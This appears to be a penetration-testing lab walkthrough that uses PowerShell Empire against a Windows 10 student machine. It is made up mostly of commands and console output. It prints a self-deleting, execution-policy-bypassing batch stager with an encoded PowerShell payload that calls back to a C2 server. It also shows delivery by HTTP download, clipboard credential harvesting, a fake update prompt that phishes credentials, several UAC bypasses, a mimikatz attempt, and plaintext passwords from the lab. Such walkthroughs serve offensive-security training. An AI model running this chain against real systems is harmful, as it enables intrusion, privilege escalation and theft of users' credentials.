└─# cp /usr/share/powershell-empire/empire/client/generated-stagers/welcome.bat .

┌──(root💀securitynik)-[/tmp]
└─# ls -l welcome.bat 
-rw-r--r-- 1 root root 4009 Nov 20 12:45 welcome.bat

Looking at the folders in the powershell-empire path.

┌──(root💀securitynik)-[/tmp]
└─# ls /var/lib/powershell-empire/
data  empire  empire.db  empire.debug  LastTask

Being a little curious to see what is so far in the empire.db file, using strings I see ...

┌──(root💀securitynik)-[/tmp]
└─# strings /var/lib/powershell-empire/empire.db | more

SQLite format 3
]3
securitynik$2b$12$uoR.NXYK98MnTFe1kWuqGOoTvRYiuhoDys2f65.Ywq9bHDVNeU40Wlffg4uuayna6os6iur3ua46t9um0ylp7hc4k8ufm2021-11-20
 17:18:31
^3httphttpclient_server
Name
Description
Name for the listener.
Required
Value
http
SuggestedValues
Strict
Host
Hostname/IP for staging.
http://10.0.0.107:443
BindIP
(The IP to bind to on the control server.
10.0.0.107

... TRUNCATED FOR BREVITY ...

Looking at a snapshot of the content of the welcome.bat file.

┌──(root💀securitynik)-[/tmp]
└─# cat welcome.bat 
# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBF... TRUNCATED FOR BREVITY ... YQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Interesting! Time to get this file to the target system. Setup a Python SimpleHTTPServer.

┌──(root💀securitynik)-[/tmp]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

2. Gaining Access

To gain access, we have to get the welcome.bat file to the user or influence the user to download and or open this file. Using the browser, I'm going to download and execute the file.

Below shows the file being downloaded

┌──(root💀securitynik)-[/tmp]
└─#  python -m SimpleHTTPServer 80 
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [20/Nov/2021 12:56:02] "GET / HTTP/1.1" 200 -
10.0.0.110 - - [20/Nov/2021 12:56:04] code 404, message File not found
10.0.0.110 - - [20/Nov/2021 12:56:04] "GET /favicon.ico HTTP/1.1" 404 -
10.0.0.110 - - [20/Nov/2021 12:56:10] "GET /welcome.bat HTTP/1.1" 200 -

With the file downloaded, once it is run, here is what we see on the client console of Powershell Empire:

[+] New agent E7ULVTA6 checked in
[*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110
(Empire: usestager/windows/launcher_bat) >

and on the server side of empire ...

[*] Sending POWERSHELL stager (stage 1) to 10.0.0.110
[*] New agent E7ULVTA6 checked in
[+] Initial agent E7ULVTA6 from 10.0.0.110 now active (Slack)
[*] Sending agent (stage 2) to E7ULVTA6 at 10.0.0.110

Listing the agents, I see ...

(Empire: usestager/windows/launcher_bat) > agents

┌Agents─────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name     │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼──────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ E7ULVTA6 │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:40:10 EST │ http     │
│    │          │            │             │                      │            │      │        │ (30 seconds ago)        │          │
└────┴──────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Renaming the agent to something more meaningful.

(Empire: agents) > rename E7ULVTA6 SANS560WINlowpriv

Listing the agents, we see

(Empire: agents) > list

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 13:43:22 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (18 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Interacting with the agent.

(Empire: agents) > interact SANS560WINlowpriv
(Empire: SANS560WINlowpriv) >

Now that we have an agent, a downloads folder has been created for that agent. There is also a file named LastTask.

┌──(root💀securitynik)-[/tmp]
└─# ls /var/lib/powershell-empire/
data  downloads  empire  empire.db  empire.debug  LastTask

In the downloads folder, there is a folder named SANS560WINlowpriv, which represents the agent. Here is what gets written to the file once the agent gets registered.

┌──(root💀securitynik)-[/tmp]
└─# cat /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log | more

2021-11-20 13:04:03 : 

[*] Agent info:
  ID                    1
  session_id            E7ULVTA6
  listener              http
  name                  E7ULVTA6
  language              powershell
  language_version      5
  delay                 60
  jitter                0.0
  external_ip           10.0.0.110
  internal_ip           10.0.0.110
  username              SEC560STUDENT\sec560
  high_integrity        0
  process_name          powershell
  process_id            3600
  hostname              SEC560STUDENT
  os_details            Microsoft Windows 10 Enterprise
  session_key           EXaWl+/do>Rk8ef2g`[^$t7D}Oywz\NC
  nonce                 2658109564916705
  checkin_time          2021-11-20 18:04:02+00:00
  lastseen_time         2021-11-20 18:04:03+00:00
  parent                None
  children              None
  servers               None
  profile               /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
                                6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  kill_date             11/22/2021
  working_hours         00:00-23:59
  lost_limit            60

[+] Agent E7ULVTA6 now active:


2021-11-20 13:43:22 : 
[*] Agent renamed from E7ULVTA6 to SANS560WINlowpriv

Moving forward, I will be tailing this file as follows, to see what is written as the tasks are executed.

┌──(root💀securitynik)-[/tmp]
└─# tail --follow --lines 0 /var/lib/powershell-empire/downloads/SANS560WINlowpriv/agent.log

3. Examining the system

With access gain, time to examine the system. First up, whoami.

(Empire: SANS560WINlowpriv) > whoami
[*] Tasked E7ULVTA6 to run Task 1

Looking at the agent.log, I see.

2021-11-20 13:55:25 : 
tasked agent E7ULVTA6 to run command whoami

2021-11-20 13:56:12 : 
SEC560STUDENT\sec560

Looking at process information on the host.

(Empire: SANS560WINlowpriv) > ps
[*] Tasked E7ULVTA6 to run Task 2

Confirming the activity from the agent.log file.

2021-11-20 14:36:14 : 
tasked agent E7ULVTA6 to run command ps

2021-11-20 14:36:26 : 
ProcessName              PID Arch UserName             MemUsage 
-----------              --- ---- --------             -------- 
Idle                       0 x64  N/A                  0.01 MB  
System                     4 x64  N/A                  0.09 MB  
Registry                  88 x64  N/A                  19.02 MB 
svchost                  328 x64  N/A                  45.00 MB 
smss                     332 x64  N/A                  0.91 MB  
svchost                  376 x64  N/A                  8.18 MB  
csrss                    416 x64  N/A                  4.07 MB  
....
dllhost                 4500 x64  SEC560STUDENT\sec560 6.84 MB  
SearchUI                4576 x64  SEC560STUDENT\sec560 16.41 MB 
...

Dropping down to the command shell to see what else we can do.

(Empire: SANS560WINlowpriv) > shell
[*] Exit Shell Menu with Ctrl+C
(SANS560WINlowpriv) C:\Users\sec560\Downloads >

Running the whoami command again, to grab information about groups and the integrity level the process is running with.

(SANS560WINlowpriv) C:\Users\sec560\Downloads > cmd.exe /c "whoami /groups"
GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                        
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only                          
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory 
...
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192
(SANS560WINlowpriv) C:\Users\sec560\Downloads >

While the process may not be running as administrator, the user that is running the process is part of the administrator group. This means, we can attempt to elevate privileges by taking advantage of something such as bypassuac.

Confirming the users who are part of the administrators group.

(SANS560WINlowpriv) C:\Users\sec560\Downloads > whoami
SEC560STUDENT\sec560

(SANS560WINlowpriv) C:\Users\sec560\Downloads > net localgroup administrators

Looking at the agent.log.

2021-11-20 15:11:55 : 
tasked agent E7ULVTA6 to run command net localgroup administrators

2021-11-20 15:12:29 : 
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
sec560
The command completed successfully.

Going back to the Empire environment to perform additional analysis of the host.

Grabbing a screenshot of the system.

2021-11-20 15:17:49 : 
tasked agent E7ULVTA6 to run module Get-Screenshot

2021-11-20 15:18:30 : 
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg

Opening the screenshot, we see

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# xdg-open /var/lib/powershell-empire/downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_15-18-30.jpg &

Grabbing a screenshot from a different perspective

(Empire: agents) > usemodule powershell/collection/screenshot

┌Record Options────┬──────────┬───────────────────────────────────┐
│ Name  │ Value    │ Required │ Description                       │
├───────┼──────────┼──────────┼───────────────────────────────────┤
│ Agent │ E7ULVTA6 │ True     │ Agent to run module on.           │
├───────┼──────────┼──────────┼───────────────────────────────────┤
│ Ratio │ 80       │ False    │ JPEG Compression ratio: 1 to 100. │
└───────┴──────────┴──────────┴───────────────────────────────────┘

(Empire: usemodule/powershell/collection/screenshot) > execute
[*] Tasked E7ULVTA6 to run Task 8
[+] Output saved to ./downloads/SANS560WINlowpriv/Get-Screenshot/SEC560STUDENT_2021-11-20_16-10-26.jpg
(Empire: usemodule/powershell/collection/screenshot) >

Trying to run mimikatz

(Empire: SANS560WINlowpriv) > mimikatz
[!] Error: module needs to run in an elevated context

Ooops!! Looks like we definitely need that elevated privileges. Looking to see what else can be learned about the system.

Grabbing contents from the clipboard.

(Empire: SANS560WINlowpriv) > usemodule powershell/collection/clipboard_monitor
[*] Set Agent to SANS560WINlowpriv


┌Record Options───┬───────────────────┬──────────┬─────────────────────────────────────┐
│ Name            │ Value             │ Required │ Description                         │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ Agent           │ SANS560WINlowpriv │ True     │ Agent to run module on.             │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ CollectionLimit │                   │ False    │ Specifies the interval in minutes   │
│                 │                   │          │ to capture clipboard text. Defaults │
│                 │                   │          │ to indefinite collection.           │
├─────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ PollInterval    │ 15                │ True     │ Interval (in seconds) to check the  │
│                 │                   │          │ clipboard for changes, defaults to  │
│                 │                   │          │ 15 seconds.                         │
└─────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/collection/clipboard_monitor) > set CollectionLimit 5
[*] Set CollectionLimit to 5
(Empire: usemodule/powershell/collection/clipboard_monitor) > execute
[*] Tasked SANS560WINlowpriv to run Task 9


Looking at the agent.log, we see.

2021-11-20 16:14:27 : 
Job started: XGSUZT

2021-11-20 16:15:28 : 
=== Get-ClipboardContents Starting at 20/11/2021:21:18:02:34 ===

=== 20/11/2021:21:18:02:58 ===

credentials for securitynik.local - securitynik:Password1
credentials for securitynik mail  - securitynik:Password1Mail
credentials for securitynik cloud  - securitynik:Password1Cloud

Running checks for possible vectors for privilege escalations.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/powerup/allchecks
[*] Set Agent to SANS560WINlowpriv

┌Record Options──┬───────────────────┬──────────┬─────────────────────────────────────┐
│ Name           │ Value             │ Required │ Description                         │
├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ Agent          │ SANS560WINlowpriv │ True     │ Agent to run module on.             │
├────────────────┼───────────────────┼──────────┼─────────────────────────────────────┤
│ OutputFunction │ Out-String        │ False    │ PowerShell's output function to use │
│                │                   │          │ ("Out-String", "ConvertTo-Json",    │
│                │                   │          │ "ConvertTo-Csv", "ConvertTo-Html",  │
│                │                   │          │ "ConvertTo-Xml").                   │
└────────────────┴───────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/privesc/powerup/allchecks) > execute
[*] Tasked SANS560WINlowpriv to run Task 10

Looking at the agent.log.

2021-11-20 16:29:34 : 
Job started: NHVZSR

2021-11-20 16:30:34 : 

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.

...
[*] Checking service executable and argument permissions...
...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...
...
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....

Invoke-AllChecks completed

Since the recommendation above is to run a UAC Bypass attack, let's follow that guidance.

4. Elevate Privileges

There are a few different ways to elevate our privileges. First, let's confirm our current privileges.

(Empire: usemodule/powershell/privesc/powerup/allchecks) > agents

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 16:34:35 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (26 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

What you will notice with above, is once we gain elevated privileges, the name will have an asterisk (*).

First, let's use the toasted option, to "ask" the user for their credentials.

(Empire: SANS560WINlowpriv) > usemodule powershell/collection/toasted
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/collection/toasted) >  set CredBoxTitle "SecurityNik is asking you to restart ;-)"
[*] Set CredBoxTitle to SecurityNik is asking you to restart ;-)

(Empire: usemodule/powershell/collection/toasted) > options

┌Record Options──┬───────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name           │ Value                             │ Required │ Description                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent          │ SANS560WINlowpriv                 │ True     │ Agent to phish credentials from     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Application    │ System Configuration              │ True     │ Name of the application to claim    │
│                │                                   │          │ launched the prompt (ie. "outlook", │
│                │                                   │          │ "explorer")                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CredBoxMessage │ Authentication is required to     │ True     │ Message of the box prompting for    │
│                │ reschedule a system restart       │          │ credentials                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ CredBoxTitle   │ SecurityNik is asking you to      │ True     │ Title on the box prompting for      │
│                │ restart ;-)                       │          │ credentials                         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ HideProcess    │                                   │ False    │ Switch. True/False to hide the      │
│                │                                   │          │ window of the process we claim      │
│                │                                   │          │ launched the prompt (default =      │
│                │                                   │          │ false)                              │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastMessage   │ Windows will soon restart to      │ True     │ Message of toast notification box   │
│                │ complete applying recently        │          │                                     │
│                │ installed updates. Use the drop   │          │                                     │
│                │ down below to reschedule the      │          │                                     │
│                │ restart for a later time.         │          │                                     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastTitle     │ Windows will restart in 5 minutes │ True     │ Title of toast notification box     │
│                │ to finish installing updates      │          │                                     │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ToastType      │ System                            │ True     │ Type of Toast notification          │
│                │                                   │          │ ("System" or "Application")         │
├────────────────┼───────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ VerifyCreds    │                                   │ False    │ Switch. True/False to verify the    │
│                │                                   │          │ creds a user provides, and prompt   │
│                │                                   │          │ them again until they either click  │
│                │                                   │          │ cancel or enter valid creds         │
│                │                                   │          │ (default = false)                   │
└────────────────┴───────────────────────────────────┴──────────┴─────────────────────────────────────┘

Time to execute ...

(Empire: usemodule/powershell/collection/toasted) > execute
[*] Tasked SANS560WINlowpriv to run Task 11

In the first instance, I was a bit too slow to click and thus got the following message

2021-11-20 16:39:07 : 
tasked agent SANS560WINlowpriv to run module Invoke-CredentialPhisher

2021-11-20 16:40:22 : 
[-] User did not click on notification

I then ran execute again and this time got.

Looking at the agent.log, we now see the credentials.

2021-11-20 16:44:37 : 
[+] Phished credentials [Not-verified]: SEC560STUDENT/securitynik@securitynik.local Testing1

At this point, we can use those credentials in other ways. Let's find another way to elevate privileges via UAC bypass as recommended previously.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/privesc/bypassuac) > set UserAgent SecurityNik-AUCBypass-User-Agent
[*] Set UserAgent to SecurityNik-AUCBypass-User-Agent

(Empire: usemodule/powershell/privesc/bypassuac) > set Listener http
[*] Set Listener to http

Reviewing the configuration.

(Empire: usemodule/powershell/privesc/bypassuac) > options

┌Record Options────┬──────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                            │ Required │ Description                         │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv                │ True     │ Agent to run module on.             │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw               │ False    │ Bypasses as a space separated list  │
│                  │                                  │          │ to be prepended to the launcher.    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                             │ True     │ Listener to use.                    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                            │ False    │ Switch. Obfuscate the launcher      │
│                  │                                  │          │ powershell code, uses the           │
│                  │                                  │          │ ObfuscateCommand for obfuscation    │
│                  │                                  │          │ types. For powershell only.         │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                      │ False    │ The Invoke-Obfuscation command to   │
│                  │                                  │          │ use. Only used if Obfuscate switch  │
│                  │                                  │          │ is True. For powershell only.       │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                          │ False    │ Proxy to use for request (default,  │
│                  │                                  │          │ none, or other).                    │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                          │ False    │ Proxy credentials                   │
│                  │                                  │          │ ([domain\]username:password) to use │
│                  │                                  │          │ for request (default, none, or      │
│                  │                                  │          │ other).                             │
├──────────────────┼──────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-AUCBypass-User-Agent │ False    │ User-agent string to use for the    │
│                  │                                  │          │ staging request (default, none, or  │
│                  │                                  │          │ other).                             │
└──────────────────┴──────────────────────────────────┴──────────┴─────────────────────────────────────┘

Executing the command

(Empire: usemodule/powershell/privesc/bypassuac) > execute
[*] Tasked SANS560WINlowpriv to run Task 13

Once this was run successfully, a new agent got registered.

[+] New agent 8XW5324B checked in
[*] Sending agent (stage 2) to 8XW5324B at 10.0.0.110

Looking at the agents again, we see.

(Empire: usemodule/powershell/privesc/bypassuac) > agents

┌Agents──────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name              │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:05:45 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (38 seconds ago)        │          │                                                                                    
├────┼───────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 2  │ 8XW5324B*         │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:05:58 EST │ http     │                                                                                    
│    │                   │            │             │                      │            │      │        │ (25 seconds ago)        │          │                                                                                    
└────┴───────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Notice the agent with ID 2, has an asterisk (*) next to it, this means it is high privilege. Let's rename this agent and run the agents command again.

(Empire: agents) > rename 8XW5324B SANS560HighPrivBypassUAC
(Empire: agents) > agents

┌Agents──────────────────────────┬────────────┬─────────────┬──────────────────────┬────────────┬──────┬────────┬─────────────────────────┬──────────┐
│ ID │ Name                      │ Language   │ Internal IP │ Username             │ Process    │ PID  │ Delay  │ Last Seen               │ Listener │
├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 1  │ SANS560WINlowpriv         │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 3600 │ 60/0.0 │ 2021-11-20 17:07:45 EST │ http     │
│    │                           │            │             │                      │            │      │        │ (22 seconds ago)        │          │
├────┼───────────────────────────┼────────────┼─────────────┼──────────────────────┼────────────┼──────┼────────┼─────────────────────────┼──────────┤
│ 2  │ SANS560HighPrivBypassUAC* │ powershell │ 10.0.0.110  │ SEC560STUDENT\sec560 │ powershell │ 4356 │ 60/0.0 │ 2021-11-20 17:07:58 EST │ http     │
│    │                           │            │             │                      │            │      │        │ (9 seconds ago)         │          │
└────┴───────────────────────────┴────────────┴─────────────┴──────────────────────┴────────────┴──────┴────────┴─────────────────────────┴──────────┘

Trying to elevate privileges with the ask option.

(Empire: agents) > interact SANS560WINlowpriv
[*] Task 13 results received
Job started: G1SLA9
(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/ask
[*] Set Agent to SANS560WINlowpriv


(Empire: usemodule/powershell/privesc/ask) >  set UserAgent SecurityNik-UAC-ASK
[*] Set UserAgent to SecurityNik-UAC-ASK

(Empire: usemodule/powershell/privesc/ask) > set Listener http
[*] Set Listener to http


(Empire: usemodule/powershell/privesc/ask) > options

┌Record Options────┬─────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value               │ Required │ Description                         │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv   │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw  │ False    │ Bypasses as a space separated list  │
│                  │                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                │ True     │ Listener to use.                    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False               │ False    │ Switch. Obfuscate the launcher      │
│                  │                     │          │ powershell code, uses the           │
│                  │                     │          │ ObfuscateCommand for obfuscation    │
│                  │                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1         │ False    │ The Invoke-Obfuscation command to   │
│                  │                     │          │ use. Only used if Obfuscate switch  │
│                  │                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default             │ False    │ Proxy to use for request (default,  │
│                  │                     │          │ none, or other).                    │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default             │ False    │ Proxy credentials                   │
│                  │                     │          │ ([domain\]username:password) to use │
│                  │                     │          │ for request (default, none, or      │
│                  │                     │          │ other).                             │
├──────────────────┼─────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-UAC-ASK │ False    │ User-agent string to use for the    │
│                  │                     │          │ staging request (default, none, or  │
│                  │                     │          │ other).                             │
└──────────────────┴─────────────────────┴──────────┴─────────────────────────────────────

Executing the code

(Empire: usemodule/powershell/privesc/ask) > execute
[*] Tasked SANS560WINlowpriv to run Task 14

Once again a new agent got registered.

[+] New agent L318PM2Z checked in
[*] Sending agent (stage 2) to L318PM2Z at 10.0.0.110

Giving it a meaningful name

(Empire: usemodule/powershell/privesc/ask) > agents
(Empire: agents) > rename L318PM2Z SANS560UACAskHighPriv

(Empire: agents) > interact SANS560WINlowpriv
[*] Task 14 results received
[*] Successfully elevated!

Trying one more privilege escalation technique.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_eventvwr
[*] Set Agent to SANS560WINlowpriv

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set UserAgent SecurityNik-EventVwr-UAC-Bypass
[*] Set UserAgent to SecurityNik-EventVwr-UAC-Bypass

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > set Listener http
[*] Set Listener to http

(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) > options

┌Record Options────┬─────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                           │ Required │ Description                         │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560WINlowpriv               │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw              │ False    │ Bypasses as a space separated list  │
│                  │                                 │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                            │ True     │ Listener to use.                    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                           │ False    │ Switch. Obfuscate the launcher      │
│                  │                                 │          │ powershell code, uses the           │
│                  │                                 │          │ ObfuscateCommand for obfuscation    │
│                  │                                 │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                     │ False    │ The Invoke-Obfuscation command to   │
│                  │                                 │          │ use. Only used if Obfuscate switch  │
│                  │                                 │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                         │ False    │ Proxy to use for request (default,  │
│                  │                                 │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                         │ False    │ Proxy credentials                   │
│                  │                                 │          │ ([domain\]username:password) to use │
│                  │                                 │          │ for request (default, none, or      │
│                  │                                 │          │ other).                             │
├──────────────────┼─────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-EventVwr-UAC-Bypass │ False    │ User-agent string to use for the    │
│                  │                                 │          │ staging request (default, none, or  │
│                  │                                 │          │ other).                             │
└──────────────────┴─────────────────────────────────┴──────────┴─────────────────────────────────────┘

[*] Tasked SANS560WINlowpriv to run Task 15
(Empire: usemodule/powershell/privesc/bypassuac_eventvwr) >

While I saw entries in the log file and Event Viewer opening up, this did not give me elevated privileges.

I then tried the WScript. This reported the host was not vulnerable.

(Empire: SANS560WINlowpriv) > usemodule powershell/privesc/bypassuac_wscript
[*] Set Agent to SANS560WINlowpriv

2021-11-20 18:45:08 : 
[!] WARNING: Target Not Vulnerable

Now that we have at least 2 privilege agents, let's get some more credentials.

5. Gaining (more) credentials

With privileges elevated, time to pillage credentials.

Previously when the attempt was made to execute mimikatz, it failed. Trying it once again.

(Empire: SANS560WINlowpriv) > mimikatz
[!] Error: module needs to run in an elevated context

Ooops!!! Looks like we need to switch one of the elevated agents. Interacting with a high privilege agent.

(Empire: agents) > interact SANS560HighPrivBypassUAC
(Empire: SANS560HighPrivBypassUAC) >

Running mimikatz once again.

(Empire: SANS560HighPrivBypassUAC) > mimikatz
[*] Tasked SANS560HighPrivBypassUAC to run Task 1

